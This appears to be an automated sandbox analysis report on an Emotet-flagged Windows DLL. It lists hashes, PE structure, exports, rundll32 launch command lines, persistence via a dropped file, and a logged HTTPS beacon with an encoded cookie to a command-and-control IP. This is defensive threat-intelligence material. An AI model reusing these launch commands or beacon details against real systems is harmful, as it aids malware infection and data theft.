                                                                                                            Preview: regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmfo...................................................................................................................................................................................................................................................................................................................................................;..HvLE.>......Q...........BiUo....J...6D..........................hbin................p.\..,..........nk,.do...................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .do.......... ...........P............... .......Z.......................Root........lf......Root....nk .do.......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):7.067331172246508
                                                                                                            TrID:
                                                                                                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                            • DOS Executable Generic (2002/1) 0.20%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:3pO1282Kpx.dll
                                                                                                            File size:372736
                                                                                                            MD5:173345845a2a7d0d99c17bdc5445df90
                                                                                                            SHA1:35ed97b5ac5a3ed0fdc00eabff20f3bfcdfc8a7c
                                                                                                            SHA256:9ed58848f0a7b354a32d4ef67ea9ff70ba75f9238c39d9f1af88fae6811cb504
                                                                                                            SHA512:c67f4a25b4538ea45291636f4eb1c845bbe5ab68ae3297132f2e4bbde7f941a11eb276d5bdebe8179f412fd2e63a5346d53890c1e6aeacca88c7a84bde35bda4
                                                                                                            SSDEEP:6144:qRsMh9YQWtcgA70wgF7nJyt6CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFLQRQKqV4epRmxAvAD
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

                                                                                                            File Icon

                                                                                                            Icon Hash:74f0e4ecccdce0e4

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x1001a401
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x10000000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                            Time Stamp:0x61A7100E [Wed Dec 1 06:02:54 2021 UTC]
                                                                                                            TLS Callbacks:0x1000c500
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:6
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:6
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:6
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:609402ef170a35cc0e660d7d95ac10ce

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            cmp dword ptr [ebp+0Ch], 01h
                                                                                                            jne 00007F1A84AFA1D7h
                                                                                                            call 00007F1A84AFA568h
                                                                                                            push dword ptr [ebp+10h]
                                                                                                            push dword ptr [ebp+0Ch]
                                                                                                            push dword ptr [ebp+08h]
                                                                                                            call 00007F1A84AFA083h
                                                                                                            add esp, 0Ch
                                                                                                            pop ebp
                                                                                                            retn 000Ch
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            push dword ptr [ebp+08h]
                                                                                                            call 00007F1A84AFAA7Eh
                                                                                                            pop ecx
                                                                                                            pop ebp
                                                                                                            ret
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            jmp 00007F1A84AFA1DFh
                                                                                                            push dword ptr [ebp+08h]
                                                                                                            call 00007F1A84AFE564h
                                                                                                            pop ecx
                                                                                                            test eax, eax
                                                                                                            je 00007F1A84AFA1E1h
                                                                                                            push dword ptr [ebp+08h]
                                                                                                            call 00007F1A84AFE5E0h
                                                                                                            pop ecx
                                                                                                            test eax, eax
                                                                                                            je 00007F1A84AFA1B8h
                                                                                                            pop ebp
                                                                                                            ret
cmp dword ptr [ebp+08h], FFFFFFFFh
je 00007F1A84AFAB43h
jmp 00007F1A84AFAB20h
push ebp
mov ebp, esp
push 00000000h
call dword ptr [1002808Ch]
push dword ptr [ebp+08h]
call dword ptr [10028088h]
push C0000409h
call dword ptr [10028040h]
push eax
call dword ptr [10028090h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [10028094h]
test eax, eax
je 00007F1A84AFA1D7h
push 00000002h
pop ecx
int 29h
mov dword ptr [1005AF18h], eax
mov dword ptr [1005AF14h], ecx
mov dword ptr [1005AF10h], edx
mov dword ptr [1005AF0Ch], ebx
mov dword ptr [1005AF08h], esi
mov dword ptr [1005AF04h], edi
mov word ptr [eax], es

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x58390          0x8ac         .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x58c3c          0x3c          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5d000          0x1bb0        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x56fdc          0x54          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x57100          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x57030          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x28000          0x154         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x264f4       0x26600   False     0.546620521173   data       6.29652715831  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x28000          0x313fa       0x31400   False     0.822468868972   data       7.43227371512  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x5a000          0x1844        0xe00     False     0.270647321429   data       2.60881097454  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata  0x5c000          0x66c         0x800     False     0.3583984375     data       2.21689595795  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc  0x5d000          0x1bb0        0x1c00    False     0.784598214286   data       6.62358237634  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL           Import
KERNEL32.dll  HeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer
USER32.dll    GetDC, ReleaseDC, GetWindowRect

Exports

Name               Ordinal  Address
Control_RunDLL     1        0x100010a0
ajkaibu            2        0x100016c0
akyncbgollmj       3        0x10001480
alrcidxljxybdggs   4        0x10001860
bgmotrriehds       5        0x10001820
bojkfvynhhupnooyb  6        0x100019f0
bujuoqldqlzaod     7        0x10001800
bunsahctogxzts     8        0x100019e0
cjogbtafwukesw     9        0x10001830
csbbcaopuok        10       0x100016a0
cyqrjpaeorjur      11       0x100015f0
dlrzuyaeqj         12       0x10001840
egiimrq            13       0x10001850
evhgyts            14       0x100014f0
fdqpjjjyuw         15       0x100017e0
finabzjyxhxnnuuv   16       0x10001510
fkeacqpbbfw        17       0x10001910
fuwsgzf            18       0x10001790
fzbmpailk          19       0x10001980
gamsrhauvgl        20       0x10001810
gjfqgtgk           21       0x10001a10
gwsmfxfmekkyr      22       0x100018b0
haymuvtatadeydqmk  23       0x10001530
hqruohhkvpdalhq    24       0x10001620
htdaydfvtjlujwcaj  25       0x10001660
hzyrvjtx           26       0x100017c0
ifnsupqhxkwj       27       0x10001870
ijhgowlpmypocg     28       0x10001720
ispjhrqaxnyflnn    29       0x100015a0
iszvcqv            30       0x100017a0
ixgucop            31       0x100018d0
jcdvrhrguqtjpkc    32       0x100016b0
jkfyadsdpoks       33       0x100019c0
kfzgxmljkwaqy      34       0x10001730
kzfvroxozxufciczm  35       0x10001740
lpstjqa            36       0x10001900
ltkoyvzovzkqemyw   37       0x10001630
mdigcwjymnzvgaql   38       0x100014d0
mefathlzguuhqodfx  39       0x10001950
mgsrmfbja          40       0x10001500
mrxhcceopg         41       0x100014a0
nafhmuoq           42       0x100018f0
nefxgpc            43       0x100018a0
nrehxpiznrppeu     44       0x10001690
nucocnvjyqp        45       0x100018e0
obxoxtcbntaxofr    46       0x10001890
ofrzojd            47       0x100016e0
oofbctfc           48       0x10001550
opzpazspbecyjojf   49       0x100015b0
oqoigff            50       0x10001a00
oujlzhzvhjh        51       0x100016f0
ovpsanbypajv       52       0x100015e0
pblpcaadqbdxyb     53       0x10001680
ragwdgnyohftj      54       0x100017d0
rfosmac            55       0x10001710
rgymbuetvifqjqdlo  56       0x10001930
rmoxbxbbgidnbds    57       0x10001970
rxnkmfbycdcc       58       0x10001560
sefltbc            59       0x10001880
sgieprcsphl        60       0x100019a0
shpcmnqzvyltgdt    61       0x100016d0
slktbekupvmdbt     62       0x100015c0
sormivnk           63       0x10001570
tdblkstlyin        64       0x10001600
tkllyrc            65       0x10001650
tkwpnvfqnbpbdqe    66       0x10001a20
tnhtgnjrabqakgeke  67       0x10001700
tzpmcwwig          68       0x10001520
uceklmggjof        69       0x10001610
ukwdddyj           70       0x10001640
uwnaptydgur        71       0x10001940
vjusqoeo           72       0x10001580
vnyufpq            73       0x10001590
vsrwmkhzkrtlexxb   74       0x100014e0
wermsdfzb          75       0x10001770
wkhpfdjkypy        76       0x100014c0
wksndtayhfm        77       0x100015d0
wnjvxspilxpchq     78       0x10001670
wuqwfssiddrcl      79       0x10001570
wyyhtqptznbrknitg  80       0x100017f0
wzkcijdvadq        81       0x10001540
wzxlvxuyy          82       0x100019b0
xhtxeilfgsghxik    83       0x10001780
xvdijhconoukll     84       0x100014b0
ybbwnezvxfafm      85       0x10001750
yeylpreasnzamgac   86       0x100019d0
ypkidshxgzkkehc    87       0x100018c0
ypzvmpfbgai        88       0x10001760
zbrzizodycg        89       0x10001990
zdiuqcnzg          90       0x10001920
zfkwwtxd           91       0x10001490
zktykfwmaehxg      92       0x10001600
zmkbqvofdhermov    93       0x10001960
zvtqmkitgmzgo      94       0x100017b0

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Dec 2, 2021 09:37:00.963155031 CET  49804        443        192.168.2.5  45.63.5.129
Dec 2, 2021 09:37:00.963232994 CET  443          49804      45.63.5.129  192.168.2.5
Dec 2, 2021 09:37:00.963329077 CET  49804        443        192.168.2.5  45.63.5.129
Dec 2, 2021 09:37:01.001019955 CET  49804        443        192.168.2.5  45.63.5.129
Dec 2, 2021 09:37:01.001066923 CET  443          49804      45.63.5.129  192.168.2.5
Dec 2, 2021 09:37:01.338563919 CET  443          49804      45.63.5.129  192.168.2.5
Dec 2, 2021 09:37:01.338795900 CET  49804        443        192.168.2.5  45.63.5.129
Dec 2, 2021 09:37:02.504507065 CET  49804        443        192.168.2.5  45.63.5.129
Dec 2, 2021 09:37:02.504545927 CET  443          49804      45.63.5.129  192.168.2.5
Dec 2, 2021 09:37:02.504834890 CET  443          49804      45.63.5.129  192.168.2.5
Dec 2, 2021 09:37:02.504904032 CET  49804        443        192.168.2.5  45.63.5.129
Dec 2, 2021 09:37:02.532196045 CET  49804        443        192.168.2.5  45.63.5.129
Dec 2, 2021 09:37:02.572880983 CET  443          49804      45.63.5.129  192.168.2.5
Dec 2, 2021 09:37:03.082030058 CET  443          49804      45.63.5.129  192.168.2.5
Dec 2, 2021 09:37:03.082098007 CET  443          49804      45.63.5.129  192.168.2.5
Dec 2, 2021 09:37:03.082125902 CET  49804        443        192.168.2.5  45.63.5.129
Dec 2, 2021 09:37:03.082154989 CET  49804        443        192.168.2.5  45.63.5.129
Dec 2, 2021 09:37:03.083518982 CET  49804        443        192.168.2.5  45.63.5.129
Dec 2, 2021 09:37:03.083554029 CET  443          49804      45.63.5.129  192.168.2.5

HTTP Request Dependency Graph

• 45.63.5.129

HTTPS Proxied Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.5  49804        45.63.5.129     443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-12-02 08:37:02 UTC  0                   OUT        GET /fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDN HTTP/1.1
                                                        Cookie: gKjP=1pPfMaoMdVUlKQUbAdiebE1XTzpT49WAqPCFzf9esRtAAep5qXcDMA3UcMnz2kDny2NkJZ+XzMNPrbuwewGy7ajRk6O8pCIMyS/tk7KPZ1sVOCZDzij8ol0kzhAKz+cyhczW5/Qg7WStsqckEM0Ai/TBhgYa4zLpY2xrkvKaCs5ZjXU46E7u7NfJ6u2+utMTe+1C5zhUB/BGEkeunoDpKbWBm9Kwrc3B7WoAGu/lbHZZe8hOoLZlL9MMnyWT3k4lhqZIOv4dj0Q=
                                                        Host: 45.63.5.129
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
2021-12-02 08:37:03 UTC  0                   IN         HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 02 Dec 2021 08:37:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
2021-12-02 08:37:03 UTC  0                   IN         Data Raw: 32 35 36 0d 0a 73 be ca 7a 21 48 c8 2b 79 4b c2 72 82 e8 dd fb b0 56 4c 47 4b a2 7c 23 1b cd 24 12 83 2b 6d 00 6f 5b 28 cc be 61 69 07 46 c1 a1 5c e9 76 99 a1 73 90 4e c2 38 17 a8 f0 d9 9e 27 6a 88 9e d3 8d 86 66 a7 d2 ab 19 f8 92 2d f8 18 1b d8 97 6a fd 74 31 92 f5 b0 c8 9d c2 36 31 b4 69 a6 e2 c6 7b fe ff c9 0a ad 0e 10 c7 d2 78 73 00 d5 18 fb 70 e4 74 ff e6 08 2b 3b 43 1e 5f 43 1a 8a c4 84 85 01 4f 2b af 8f 37 7c 49 46 bc dd a0 5d 23 4c dd da 21 b8 7b 87 01 c4 2d 9b af 3e e3 91 40 57 b4 d2 2b 1b dd a2 4a 52 94 09 e4 6f 55 b3 62 d6 a3 4e 02 05 f7 31 24 ee c2 1c b8 3c 6d 2a 0a 54 fa 54 de 9d 14 7c d6 16 ea d3 12 67 58 f4 33 33 53 ee c7 b1 0b 2d 38 3d 1b b6 bb c2 97 d7 01 4d 54 93 14 67 cc 17 d1 08 fc d8 e1 04 e9 c7 5e 22 3c e4 c3 ad 05 f7 52 cc 20 28 ab
                                                        Data Ascii: 256sz!H+yKrVLGK|#$+mo[(aiF\vsN8'jf-jt161i{xspt+;C_CO+7|IF]#L!{->@W+JRoUbN1$<m*TT|gX33S-8=MTg^"<R (


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 09:33:16
Start date: 02/12/2021
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll"
Imagebase: 0x1240000
File size: 893440 bytes
MD5 hash: 72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.516872338.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.516872338.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.493687779.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.493687779.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.515626652.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.515626652.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.515526987.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.515526987.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.544935545.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.544935545.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.495396645.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.495396645.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.495107069.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.495107069.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.493911106.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.493911106.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.516972039.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.516972039.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.545005644.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.545005644.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            Reputation:high

General

Start time: 09:33:16
Start date: 02/12/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
Imagebase: 0x150000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:33:17
Start date: 02/12/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLL
Imagebase: 0x850000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.475419249.0000000000520000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.475419249.0000000000520000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000003.459775725.0000000000749000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000003.459775725.0000000000749000.00000004.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 09:33:17
Start date: 02/12/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
Imagebase: 0x850000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.471143849.000000000294A000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.470997195.0000000000700000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.470997195.0000000000700000.00000040.00000010.sdmp, Author: Joe Security
Reputation: high

General

Start time: 09:33:21
Start date: 02/12/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,ajkaibu
Imagebase: 0x850000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.490792818.00000000006D0000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.490792818.00000000006D0000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.492232954.0000000002A3A000.00000004.00000020.sdmp, Author: Joe Security
Reputation: high

General

Start time: 09:33:25
Start date: 02/12/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,akyncbgollmj
Imagebase: 0x850000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.494249926.00000000035DA000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.494093661.00000000033E0000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.494093661.00000000033E0000.00000040.00000010.sdmp, Author: Joe Security
Reputation: high

General

Start time: 09:33:28
Start date: 02/12/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:33:38
Start date: 02/12/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:33:53
Start date: 02/12/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:34:11
Start date: 02/12/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:34:33
Start date: 02/12/2021
Path: C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\SgrmBroker.exe
Imagebase: 0x7ff63cd60000
File size: 163336 bytes
MD5 hash: D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:34:50
Start date: 02/12/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

General

Start time: 09:35:01
Start date: 02/12/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
Imagebase: 0x850000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 09:35:03
Start date: 02/12/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg",diWFDzhLoc
Imagebase: 0x850000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.592715201.000000000354A000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.592655915.00000000033D0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.592655915.00000000033D0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                            General

                                                                                                            Start time:09:35:09
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                                                                                                            Imagebase:0x850000
                                                                                                            File size:61952 bytes
                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Start time:09:35:15
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                                                                                                            Imagebase:0x850000
                                                                                                            File size:61952 bytes
